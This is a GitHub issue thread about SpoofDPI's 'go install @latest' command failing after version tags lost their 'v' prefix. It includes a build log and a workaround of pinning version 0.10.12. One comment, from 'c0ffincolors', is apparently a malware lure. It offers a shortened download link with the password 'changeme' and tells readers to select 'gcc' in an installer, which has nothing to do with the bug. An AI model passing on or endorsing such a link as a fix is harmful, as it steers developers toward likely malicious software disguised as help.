### ISSUE TITLE
Remove "v" letter in version breaks "go install" command

### ISSUE THREAD

**Issue by gavrilovegor519** [xvzc/SpoofDPI#210]
### Description

Example: https://github.com/gavrilovegor519/spoofdpi-docker/actions/runs/10581764685

Log:

```text
go: downloading github.com/xvzc/SpoofDPI v0.10.10
go: github.com/xvzc/SpoofDPI/cmd/spoofdpi@latest: module github.com/xvzc/SpoofDPI@latest found (v0.10.10), but does not contain package github.com/xvzc/SpoofDPI/cmd/spoofdpi
```

Caching is disabled completely in Action.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by gavrilovegor519** [comment]
I'm this partly fixed through fixate 0.10.12 version. Tag "latest" not working, because version is not compatible with Go version mechanism.
